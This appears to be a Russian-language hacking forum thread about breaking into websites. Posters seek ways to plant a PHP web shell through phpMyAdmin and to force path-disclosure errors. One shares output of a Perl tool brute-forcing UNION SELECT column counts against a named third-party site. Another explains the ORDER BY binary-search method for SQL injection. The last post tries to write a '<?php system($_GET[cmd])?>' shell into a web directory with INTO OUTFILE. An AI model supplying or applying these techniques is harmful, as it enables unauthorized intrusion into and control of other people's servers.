у меня такой вопрос есть ли способ загрузить web shell через phpMyAdmin Если есть то пожалуйста обьясните как или дайте топик где это уже обьяснялося
еще один вопрос можно ли сделать какую либо ошибку в базе данных или в phpMyAdmin что бы определить путь к домашней директории
Возникал такой же вопрос недели 3 назад...Пытался таим спопобом залить шелл, но не нашёл диру на запись... Есть ли другой способ?
Code: http://www.google.ru/search?complete=1&hl=ru&newwindow=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=j4T&q=phpmyadmin+%D1%80%D0%B0%D1%81%D0%BA%D1%80%D1%8B%D1%82%D0%B8%D0%B5+%D0%BF%D1%83%D1%82%D0%B5%D0%B9&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr= Я другого способа не знаю, только так имхо
Не найдено ни одного документа, соответствующего запросу phpmyadmin раскры% D1‚РёРµ путей. Рекомендации: Убедитесь, что все слова написаны без ошибок. Попробуйте использовать другие ключевые слова. Попробуйте использовать более популярные ключевые слова. Попробуйте уменьшить количество слов в запросе. Вот что на твой запрос выдает
нужен скрипт на perl'e который быстро подбирает количество столбцов при sql инекциях у кого есть пожалуйста выложите давно такой ищу
https://forum.antichat.ru/thread28461.html по этой ссылке запускаю скрипт так C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'" мне выдает следующее C:\sql\public>sql_check_111.pl -u "http://zonewm.biz/showa.php?id=129'" =====_Script_Brut_Columns_===== Wed Dec 26 16:59:16 2007 *URL:___________http://zonewm.biz/showa.php?id=129' Evristic:______ON Min_columns:___1 Max_columns:___50 Metod:_________UNION SPACE:_________%20 NULL:__________1,2,3... POST-GET:______GET Time(sleep):___0 User-Agent:____useragent.txt PROXY:_________proxy.txt Log:___________log_check.txt =====_Script_Brut_Columns_===== GO! Start evristic detection. Please, WAIT... Detect MySQL Start UNION SELECT Please, wait... Try 1 column... ------------------------ OK! Find 1 columns. Right URL: http://zonewm.biz/showa.php?id=129'%20UNION%20SELECT%201/* что я не то делаю?
дело в том что нужен скрипт ручками то я подобрал дело в том что встречаются сайты у которых по 80 строк ручками подбирать придется долго
алгоритм -1+order+by+1/* -1+order+by+100/* ошибка -> -1+order+by+50/* нет ошибки -> -1+order+by+75/* ошибка -> -1+order+by+61/* итд... heks, и логов меньше оставишь, и руку набьешь)))
Никога так не заливал. Решил попробовать вот что выплюнул Выставил права на 777 и сделал строку типа <? SQL: select <?system($_GET[cmd])?> Тоже самое. #1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '<?php system($_GET[cmd])?> into outfile '/www/sait.ru/php
